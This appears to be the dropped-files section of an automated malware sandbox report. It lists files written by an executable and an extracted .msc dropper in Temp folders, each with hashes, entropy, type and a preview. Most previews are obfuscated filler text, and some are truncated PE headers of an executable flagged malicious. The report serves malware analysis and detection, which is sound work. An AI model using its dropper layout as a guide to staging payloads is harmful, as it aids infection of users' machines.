                                                            Preview:fiPeEIy73Y85..BorderConstants ComboConstants..3931241g3n2m91W539vsJTVwdKfCFt973250V7t3R6SF25u081N938MK56zrya45o6UI94I3043yX6CX88I0F9jV9173zMh0Q9wR835e493H9K47vyX35bBr7..BorderConstants ButtonConstants..76197BO29bpi34bq468HLF86NlMR4g1dLp70h39cAbt38K6z321m9vzWy1x8fvBE7D8z45..GuiDateTimePicker GuiDateTimePicker..D9Ii70c45twVbmF4Ser7wYtbdBe12899ZFZw6i1R3Zu8Yqu078D5R9Y15dfN72p3Oy94P1b2177181O88G10vV94q3vS42C0xS5x76H63xvh76W68280R87l3I19B641vW7h7RWU3871h5615ZR48EyRei..GuiDateTimePicker FontConstants..w4z10485N3Y4gXI0a599f35R30Ap5u46IN96N10G171228d98H332ujaXsD3j9551U..TreeViewConstants ToolbarConstants..
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):603
                                                            Entropy (8bit):5.6339556731673985
                                                            Encrypted:false
                                                            SSDEEP:12:ke35nmSIR4ZnJeL1yPDhqlWgDHpIibhhv1Re9:ke35mRR4d0L1yPDhWrhd7W
                                                            MD5:E567673511B0E87E9582F248BEBB9132
                                                            SHA1:2DE90139ABE461A9C9CFD885A2FB660EE24224AF
                                                            SHA-256:56EB9CD2AAD3A869A79E63B8867C01364B091892AD984F2C31C8F2426656881B
                                                            SHA-512:366EC7F1DA50C20CCAFA58C967724DF9F57635AB69FB2E5F67F430EACDEDCF67668B7B957DC46C2CF42E6890DE90F80C2EE46656795C90F16DCD4AEE9627023C
                                                            Malicious:false
                                                            Preview:28f6F1j260yp2..GuiDateTimePicker UpDownConstants..DZ146vE8of5Ksk34P7Za5vgSZ0x7aHraa53rs0LwqDzlyAd6ZUhp9uCHx349VYO4n881o91CbDmg6WPC339P20M5O41..FileConstants ComboConstants..8481486m1TM7G0p3h3ScH588GM7Omo6J3444n901cywLe4..DateTimeConstants DateTimeConstants..57lNxaQE9RcW09rU0E44gS0AYE20H9BzsV59fd4N179ekYn3z6L4Qyu5S5088nBWKInCA9xMDh7..ComboConstants ButtonConstants..m2WC817As0fO7ph957p344S52gGPF0..GuiDateTimePicker StructureConstants..132S2238746DkWcN4Fe7Fb53QDtDbvpEyp1r5Mm5c49o9bu5I2V04DRJpE35J1y7Et0k17t1MFd6Az57t18Q5069qQ6u94y1Tb754STR2wbU3CG5v74uNho8aF2ET92B646lx7..FileConstants ComboConstants..
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):558
                                                            Entropy (8bit):5.4249857641377375
                                                            Encrypted:false
                                                            SSDEEP:12:zQkwgVKGFrBPVRHcgfNBuJMaBPw+2xP7J:skwRGFrV8gVDaq+2xjJ
                                                            MD5:5E972946E66C873892B9DBC7627F43DA
                                                            SHA1:531AA209BEC0E92CAA45C1716009F92FDEC216E8
                                                            SHA-256:4E6AB4AF4097CDCBA0A9668830ADAB6D2F0E887F3E4A6D6C5D1E4208B8F1CD24
                                                            SHA-512:BA9B207D3CA6EEA7CF5DD80D1789FB50B26525AD7825768BD0C8E02A1F1FE9E0FBFB76BBAEE3F03C90C4CC96D66321AFE80DC0C24CA3ABC21D5A26C42BE1C9B9
                                                            Malicious:false
                                                            Preview:T49UAt23lz8879J2c1j9lx..UpDownConstants ComboConstants..5991J97j84I6HHd89JQ8AM9596MK9Ksf6Lo6d3s2068f9..ToolTipConstants ComboConstants..48EK7K17goP5ho12J52kdM13977Zq5N57SVMZ094PZTy33w704kvon81jqflw8g54uK5j2tKRHwGbg1QV57..StructureConstants TreeViewConstants..5at4alj54x5p..ComboConstants StructureConstants..51hM4FU2EU04230Q7lUc92pQw09QY80f4P9mN8929I2YSV8613a5ugetqgE356T57j1601e0232cfi5..DateTimeConstants FileConstants..200l42S40..ToolbarConstants TreeViewConstants..EVYU7941n878P31s7U1148D7E0923tv57Lzn1qCJtu77Fk3h97jW2Dqyo..ColorConstants FontConstants..
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):567
                                                            Entropy (8bit):5.56094256591372
                                                            Encrypted:false
                                                            SSDEEP:12:kXLFRBnBAu8DuiBNJHF1VlgtfTeQGsRrKKHglCvwbiPyi:UBnBcDdBNJHFqUKRGaKTbi3
                                                            MD5:08CFF3453C8ECDCAFACB5F99FF833910
                                                            SHA1:BDE46DD6D3F60241171346300AEAD24D1FBB60A8
                                                            SHA-256:8D52C2CDA979BA14CD244D5FAB615F283821B6F86C34B998D82166F0FD41521D
                                                            SHA-512:6076BE5D7B848D13CAE7B39D82D59AA137971F2438B82B85B67C119C57BA100C469B5A54B7BE4C19803BCEDC236C6D79A163A2E78BEFF78AB3C0911D8886A4E5
                                                            Malicious:false
                                                            Preview:dj40yWTkLz8gD0aE32t54cm7nbXv08WG689I6654LM24834zH42fAJzryjZr468ejo08823P9c0v8L4373072M4Pi4rM8P44L0q4h56L494M78tIn6K396ss7d1wfd719FEaQ53t2i1G6l823M9X46k058L53P5..StructureConstants UpDownConstants..N0jR3vG6Qy03m57549wztX29v8cF08H9590N42Nn4xRXxqNQh6S9169gr1364n6Bk036958IJz4lt05qW3dij1Q7KCM6JU2yK33f3Yi707H458uJc45TMFFYI66R3T20gAnT..FontConstants ComboConstants..4NJM2Qy7s5lt3Wo6025V39q7qaX51h63i0g3O3wy154c764Y9i81Vw36D69536V9EQ5gb0E1J0UHot36Dqxz0w200N8hWe03818rV5607v846w2bO9uZ02VeS24QdsEXn875t7MHO0315282XE147CvKR37090215390qcM0E2Blz..ComboConstants ComboConstants..
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):36673
                                                            Entropy (8bit):5.594573464180928
                                                            Encrypted:false
                                                            SSDEEP:768:4x6JUE3SMIoX7l10mWIkTeb7TBZb7bFZ9lcjWTMKvzkwVLMXmBGRV0h4S:4xOSzoX7BxkTI7TBxxlCWT2ALM2opS
                                                            MD5:DC4380A1A59A937CE03D955B430E9948
                                                            SHA1:AF1B043D785071D380B4129D6C18836AF858F216
                                                            SHA-256:89B5DC18DE51C0DE35B888B9FE2E8D6995917F7AFF56C6ACF1BB3185CB63BE9E
                                                            SHA-512:39A40D4A51F0C930DE35B664BEF1FC438D76F2EA1CBBF19E5A1FC718EE0B80CE9098377B9FEF8FF8ABC254B54C0711F79142B230DC18E9116BDFD995623B4AD5
                                                            Malicious:false
                                                            Preview:88M1ak5g6X4Wpk..3Inr3h1UuKjOPn0Z7wf6COg240sG536nS56Y0960L574r3x90u8328wRXC28688..4591Bui610yG7qa6y8W61V14qMc89C78h5580PyBf92e3..9z103T41U84872S62M768h3m645V8iLZ0Q77rx45rPsrPq6LnHnCI6k0kCJ..7c6o0f3n3423OuGRc1QPG58378qNHeDpq11IdT0b0VXY713I2C2IELtA3339xfw96I9J97ebP82q3..096oXVPYC188WS68XnM3T8X8P06w2I908Jrwx7Ro6xG7in370kI85YVq00H7177s11u4op3MN..TQqw26ae7n2f98i7709337h3RO8WTJ636sgu5QN03OBTiW5RA5l40Os56N0b..wT6628IJ1O00J1E36ttL8R9ek6k8Z07340nJCY02v07a9vc45i2oi..F4dn1cMAxi54xyl5e346A4284N2L56Ewb418026Oc0C579X85ORnO193tZ9pGo..6ew46AzpJ788VE7t6u1ab5u7XsGAUBFMjt846nZ37RQdE0AzwS9n66ZjB80062B0K9P66mJJS5Z66JBgRLcdMBQ10..F5o725KqV26Cq23988Glv1I668mpS73252N7Dd4D3012094aT0g5828a39IGQ9W9ET3YpQ5oJ986750g0..W993DG3349S4ln00m3yv3h575824p5Vs8517uitTf1hR8gDkoPHT3..55h03o8TM1b0965T6g2XB5ZGxM6U..0YC4mBU7JQ383mt3bHG9qih18U11133Oa439338y4U820mljq8Pd4u21..74204rz7pu2583mr173vHki684qqDl906Rvy976TRls2cQ7s3B8rP..3q3ON2GZ60BCZxL9K48886h9455Js09vT9CjN095AF..YB3j046mN988T77L8T4X8Y7w47u0B75knO0U0B38x3l3GkLQkbou9qK8j3Bc
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (406), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):84984
                                                            Entropy (8bit):2.9903521299108915
                                                            Encrypted:false
                                                            SSDEEP:24:QRP5P5P5P5P5P5P5P5P5P5P5P5P5P5P5PA0YeeeeeeeeeeeeeeeeeeeeeaYSSSSa:IHiW6WDhWC6lnIhnrQ
                                                            MD5:AE7483D6C77F985615D1A9773CF32FA4
                                                            SHA1:DF4224A3D4254710A23540C67508EE2E855311AD
                                                            SHA-256:BF37F552799B94662EC2D476D1DE56CD5DF26A74AF0303B47631C4E9EF28DC63
                                                            SHA-512:37F33701B9775824E9387DA02460E743BD166C681C16F50250253D3DFB9039D16125BCFCD14C795575512192DDF639080568577111DFDB1B46AE21CD9BEE1EEA
                                                            Malicious:false
                                                            Preview:..T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.....T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.....T.e.l.e.V.r.a.m.(.4.4.).:.T.e.l.e.V.r.a.m.(.4.
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):645
                                                            Entropy (8bit):5.557586766694295
                                                            Encrypted:false
                                                            SSDEEP:12:jpm92LT7ZCy1K8BPU8RLZjdahra+gLMgo6iwlhh2pW60D3gLCOGLv6bICL:QuZy8/LZjdasno6ip70DMTGr6bHL
                                                            MD5:10E739785CD454F2A477C9FEC9FE4A93
                                                            SHA1:88436B1606ECD432A9CBBB226A497F3F69E200B6
                                                            SHA-256:ABCEFD6184280165128C23B72ED46AA34C2E77E956AFA7EF2B2CE748FBAFA565
                                                            SHA-512:7B60546D5AA028AB8EDD2D6EBDEF6F3EC25D0ECBBD623ADC2CFC791CED54E27E081DF3E738135D278240B71FDE45353E3FCB8618823E16B0C67AF55BB35146D1
                                                            Malicious:false
                                                            Preview:4ma268jx5pe0Np1O4j8F5b8F610ECe9jg04p0I6Ms63J7qlj6Q3Re8Sw..DateTimeConstants FontConstants..9GIYgs8ms8HckR04eyO1e332wdd5..FontConstants TreeViewConstants..N4677x6it9bgevv36s742bCI94PIIn7PcXX168F6FT575616Z11zH95Rn38XI16x7060LWPzm8qxxt774X6K24I58S9hng3O7A8..DateTimeConstants ComboConstants..6dI07O30n27Z44L5Bni6Sc8t25H8c1s1PRI92j0DjBWM7U4309A33NA8xh8g1iDo21064G6qo40340DcYC494Lp5T73d12Fo077LD6F1yC8S5y1k5BW90..DateTimeConstants GuiDateTimePicker..HyJIwy..BorderConstants UpDownConstants..v7H0o3D71AX707671666D7667u32el54e3A66g0lHchd0q7iCRzr80S4916E2Jv685863U2wx1ZqG816w70ySEG9s7UY62K757vo84283uWTkX4Gc26yP8SH7..StructureConstants ButtonConstants..
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):569
                                                            Entropy (8bit):5.546164799845927
                                                            Encrypted:false
                                                            SSDEEP:6:yPLxTS4m/mxNlRwBkQRfLobhJhEWpjRIlM/IGWKd0QRI5LWiE6r4jVdKe5LWYzwU:6xTFqBhJEbhDKkb+ER6UWeTwLTDDbE1
                                                            MD5:5C2105F29D585C991E34474F76511B8B
                                                            SHA1:B8F45DDB8B66554FFF166823B3839A6754A203F1
                                                            SHA-256:E24AC134DC8B26B8036B0CD4671E4FC722E3391D5D72B897070398ED0D377353
                                                            SHA-512:854187C18AC225D61EAB217763B822D839A0082CCE5482385D9D1EED9E18F44C93CA098ACCF1C8BE8457F24DBD34F1E2FE4A354B6C8BE88559037C406DCAAD7A
                                                            Malicious:false
                                                            Preview:SM5D2N7T369p69jne3p6tH6JMCG8F1..ButtonConstants ButtonConstants..2R9W446J4613LLY6tli151Vm18qVM5BZ40Hv28M4l48C19t7b4TZlH0675jY89Q40x42Q7H8Fvgt7E9F802fOWhOi32h0R8354w13Q5r750HJY31K97HT43R984DaKRM4o2uR2Z1cVg5842HECr98G9FjmF14o0323M2l4cy4..ButtonConstants DateTimeConstants..X073683u29EW9n5J6AMJaB1DJ67x3Lv122164F3vQ8nG1n166q589T08CD6jK87l59OM55CFhnNJOx1..ToolbarConstants DateTimeConstants..WHkj91w1U6V747Ra4815Jv1o0K190L107wOau5f58q24Sa6250Yl2yn6TWs9p7V6HRK9k28K1699C7901392Q7brLd966ubRYC5w7XXtC4274O6h5ucp312c558m90r3lE3TCa541lJX5nXbbQ..GuiDateTimePicker FileConstants..
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):574
                                                            Entropy (8bit):5.506003077562106
                                                            Encrypted:false
                                                            SSDEEP:12:8XeVpRuKqetRNY9UW4DcMld6L/JQdcj0hwExqh7qkk9jhh:8apRunsNY9zwbld6LXujkWD9h
                                                            MD5:350AD61843075D982363E7DA5685789E
                                                            SHA1:1E3649C8683F73AE16F704C29E46D71FA2D3725C
                                                            SHA-256:B6C17B3F5AA47450425E920AB286E5CF5E3988271F977AE1BA969A872B9BB665
                                                            SHA-512:BEDB2CB274C7400EF8B6A39C9C5D5DB159C1CF02640F145DAA69600121A9D5A617D5BEDA4D9A6F245A33AA4C4AD3EC06C06778CAF864C06DF656BBEB81138C2E
                                                            Malicious:false
                                                            Preview:614U7iN7ZKHLl00060c35S704NfelQ056Yl50oB4QL406BuwKks1E991x0a98p8zhgLS2PwTw7Urz1qX75ENyeo5r31..StructureConstants ColorConstants..325b7L4hq467y90eM9E3T9iSh45Y689b083w85l1MV3a2k6TC4L7002qUv63Q34L904U45D99n0udbX3p7k088F..ButtonConstants ButtonConstants..109X69g8795it4ZCoBJTI63ioBh7999n25K9F9Rq9e6k77847XxBkV7qPHge2V2T78UzX..DateTimeConstants FileConstants..dK3206T1..FileConstants ToolTipConstants..c5Uaas4A3l5P50bVi39xR974uf9di1..ButtonConstants ComboConstants..Mz2E111x02Lb92LXs3D6Sos3zR2745W00F06zLv8759xr9ZL4j1IEL44I9834igo7G164Kyfk2RMRA..StructureConstants FileConstants..
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):115071724
                                                            Entropy (8bit):7.040365181374398
                                                            Encrypted:false
                                                            SSDEEP:98304:FNTNKNeNUNAN+NTNmNFNbNmN2NYNmNpNXNbNCNINVN8NeNNNBNPNLNCNjNINJNDt:B
                                                            MD5:E15FB1F8600E5EEDE00A8CA7FF8012D1
                                                            SHA1:53EA558E9EA5F975CE0D0E379BA4D2A8D9CB4968
                                                            SHA-256:4BE158BB86B94202C4DF7FB5F57EE8D3D229CB2D64E7CF764A0F2A488D517082
                                                            SHA-512:34788AA4D0BCE701C3A0DCF75C90E3DC221A7ABDF3720AF828874233A24DEB5697434E331AA43D21788EE96A9B802F1E76610FFBA2F72EF523B053C46E62FF95
                                                            Malicious:false
                                                            Preview:..;.F..F@.j*1.....Q#z...G".....!yB...y..!\....{(.)K.K.3Zk.......sp/...9.V...H..,h..J..W.....\./............r.!5....x.yI....O..........#.c.s......U.....\HgVE..R.u.2....>V.....y6.]..W..!O.a......g.|.DN?@....p..:N..K..cz....Wk?..L.....P.-.yj........x=u......7.{.R.Di.!w.8.u..G9(.t.#dKT.U...(....}.<..;$.@..6Uq.....b...:._Fh'.....P.#.|F.wt.2*.'N.....B....W..H....@U.a....6.9.l.P.1.6.y.2.H.Q.L.0.Z.Y.5.Q.9.1.0.3.8.y.j.1.s.1.Y.9.1.4.u.0.S.5.7.V.1.1.7.S.q.2.2.0.....z..E...0.d.E.n..F@.P..&..&5...S..YM..}+.y.`...H*...q...."...}1Q..7./..F37.C.dSK..uWQ..t.(./&_o....:.4...Z>....5.3.3.i.A.6.d.1.0.3.4.z.Y.5.1.p.1.8.D.4.r.J.g.8.0.Y.F.1.6.9.2.v.b......)j.D.;M<?bE-..<.8R......{......=7py>.>.2...e....,.L.\...X....=..b..^.X........Q.....{vI^.]g[..O5..0U./....#=,9..Wz.5..L......qe.S."....S...4w.>_.A#m.b.7.r.......{..p..G+.z.[.-J:...#.U..Y..k..N&0.LQ.#..p.t._."1.0.i..~..E...2..B2h.q4..W.K.R......,....1.F.8.V.I.5.X.H.8.4.D.I.X.4.9.j.1.Q.X.5.c.d.....S..t.c6.{....d\0...!.F.pN..-
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):558
                                                            Entropy (8bit):5.54174792855503
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:50E0655BD2AD0316466463E9BA2BFB7A
                                                            SHA1:9EFCC43BAB881C5ED0C25DCB5B71C8F77B017B77
                                                            SHA-256:DC284BA52997D1F413830AAA7DADC69C36D9E7F80C0EBA5B51A533359F13D88C
                                                            SHA-512:642385885F4391D4830E16E0DD1F1B90BE07879105023D968613A7499D131AE1AEF927434D4677B2CC15159F0EDFCE6C6D4661A0DB3106A266F1B7A01F90985F
                                                            Malicious:false
                                                            Preview:41rx9j46e8774Q0k055j29vDB39ly790P2iBnpB61RPYczDCTr4C1PJ3C8t4Icmp3DCUq7854cjTI9X681EZu812rH22v562MZgt3365Y0J3BXWgDG2s51620S12u0h85j189p4P7z5zcLeRxb5..ComboConstants UpDownConstants..37U5MZ3d76v1VD2H8kj3gzq50I6718xA41069T54Us0p0A8O07EmC2WoEV8OU1vUXCq..ColorConstants ToolTipConstants..RSo7L8oB5gmp0GMU..ButtonConstants ButtonConstants..44t458LiNU72iV7c14Z..DateTimeConstants GuiDateTimePicker..28tB5B90yi282nszu56931d957YFxXq273v363C0WdG99Mw2UhTxLg352Hl0I..FontConstants ButtonConstants..3127S1375ZjND6l46MU8Hlp163T48ff4..DateTimeConstants StructureConstants..
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):587
                                                            Entropy (8bit):5.630202092843055
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:2D4C59440B9BA7F2602B787A4E54EC69
                                                            SHA1:2E83423FF6F24DB5EBC610535BF95194CC7DDE58
                                                            SHA-256:6B376AA5918FBC51CFF3557373CC24307971F1C4C12E5C9F81DB3455FAFA6D25
                                                            SHA-512:A14359E1D7ED9AA196DB723F7FB59883482C84AA1C29093F56FEB6B400F33E3D2A9DF58D8EB20283AD0B63DD12AB0BA447871411174AD911FB800C2CED50F51D
                                                            Malicious:false
                                                            Preview:2026m279q345qg7M7s697E173Tt2p186Lcv796SPkY6G93T9Hwy0c80h1jKW8F3EIK9yGir27L2vM794P586zJ..TreeViewConstants ToolbarConstants..92Q5cHUkbG08oG02Bp8raMsl4y5c79gd27w49Rhk215s2SP9480n1bha2407293BpL978x1G36019E10h1kz6442xzKG5H8zjA0..TreeViewConstants StructureConstants..43Tu3479C8sFmhlS7XwhfH2X84HI12TW5yJ7892p3NG6j18697vo71a9093oeVF2Y7800L414pv328dY..FileConstants GuiDateTimePicker..RC5718ZRq92T9sY5Zs6Yd3B93777ML67F2m780O681BS22442IdS58bOg4BF79G3a5Z..GuiDateTimePicker ButtonConstants..16S622KK43683FGk96y2vov7FBCLN9R06O52O320hVNAlcFqI4z82Ul9WfT8gJ3a8Nd4T..TreeViewConstants ComboConstants..
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):625
                                                            Entropy (8bit):5.475853492450421
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:BF3CD347D5614EE1FC2AB7B1798164BB
                                                            SHA1:976562CC6D244AEFCA909FF3A31727E3AD710937
                                                            SHA-256:3605CD8EF5F90DB2E66E7EDFAA6B2F2CC376302112241BEF4BAD162F7C7EAB53
                                                            SHA-512:781A76D891CCFE35509E1D3C255D7E72F5D09A4A4DFBA5060802FC90C4989978660065DBB1ECAB4EEA1EE150DC9AD39CFA27CF0ED0879A1DE2BCD6E55C0B6483
                                                            Malicious:false
                                                            Preview:4b3vA9keP540R63i91C23..ButtonConstants DateTimeConstants..91aS881dbML4j1c98a3hfLh6N3600468o69eP9X040gwnZKX7u668MpOe7HIijmO47753T0632nH..TreeViewConstants StructureConstants..656p7OMVN24L77D9V1aLRL6Oc61937719..DateTimeConstants ButtonConstants..18f9007I1F0L606..TreeViewConstants FileConstants..s5YxrUg99915U198f1aFx39rC0417yXg320546w00O55J1NSZuqx0K256C68q3ll75F3h5l4F74o02O39avhy5R66Jy995k1zqi2Cwot0bKc2Z5168801E6o6dKK980CqRrV217t0975693Q645m4jFleB64re387Yaw53..ComboConstants ToolbarConstants..n8090464a26032Cw1KH6E4Pnu18079kn9EV98S6a644421Y9087z085vN124t9ANF89a5vU1U27K67lCC2Rz32fw1f8R..GuiDateTimePicker ToolbarConstants..
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):520
                                                            Entropy (8bit):5.6112414182811925
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:A46A327A0FCD8505553A963445E7E509
                                                            SHA1:3F15FBD861C19C4817A986F949C2A42808807975
                                                            SHA-256:0FCBF77B85E94EC077B5C96EC53FFCE6F1B2F559BF712A12387F189F6C544093
                                                            SHA-512:F5CF3EE0E0F9280E88A4C0E245F09C9699707F899575D76B8F406C1E1D8D3595D272F67644C702115B6E760614232623D552171FE1A6ECAC7063B956C22ED75F
                                                            Malicious:false
                                                            Preview:sL7gZM51T4a60J12e1zS61P5M51g9nSfUj0TUo8ws19Y40rI6uX92cP406a39Y11m8Q1638XHgSlSP45Y5mF673o8yk2y47W2t3pN6k2TYP31DBO51Qo6P4..DateTimeConstants DateTimeConstants..17djs29a5r166S1yA6dr023Vu509650MwK19e100OTKnK9FB80Zg0IZ49338cCzt4Veb1Mq0tVEs1Jx1K630655R1Mw881IKN2Io0r12R63nbv45DdOjON587uXA52Nc0j8s2I02qH..FontConstants UpDownConstants..XguGe0374591GMBNpL3VEWc59rWn4j4T5Eia603FcPWu2w0Ds7z36JyhFZ3d9026017Uae1DP8n682zdGpc3c59266f430S2L7LGy74i4170OM64D5j57S178NzkZP591I6ImR273S6j94t8W6rGz46v3..TreeViewConstants ToolbarConstants..
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):947288
                                                            Entropy (8bit):6.629681466265794
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                            SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                            SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                            SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):947288
                                                            Entropy (8bit):6.629681466265794
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                            SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                            SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                            SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):947288
                                                            Entropy (8bit):6.629681466265794
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                            SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                            SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                            SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):545
                                                            Entropy (8bit):5.58091263701808
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:F1A4A151D27950929A91C6C98DD4386C
                                                            SHA1:693545012853D5C5A82778B73A766D0571B812CF
                                                            SHA-256:593EBB913D36131695583CA72F0089D896219F7184E96576D62A470D2481271C
                                                            SHA-512:66DE7CB53C15B52B786E246B7E0D60866EE69207B22579A59CA142F063F59F5FA59209B8104457E43D6F8A6B6E3037346E1ACCC1506C62D279608970CC765316
                                                            Malicious:false
